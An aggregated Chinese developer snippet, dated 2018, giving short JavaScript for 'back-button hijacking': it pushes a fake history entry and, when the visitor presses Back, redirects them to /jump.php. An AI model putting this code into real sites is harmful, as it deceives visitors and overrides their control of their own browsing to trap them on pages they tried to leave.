


























2018-01-29 17:59:45 · 王二 · Dev
返回键劫持,强制跳转到指定链接
代码如下:
window.onhashchange=function(){jp();};
function hh() {history.pushState(history.length+1, "message", "#"+new Date().getTime());}
function jp() {location.href="/jump.php";}
setTimeout('hh();', 50);
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。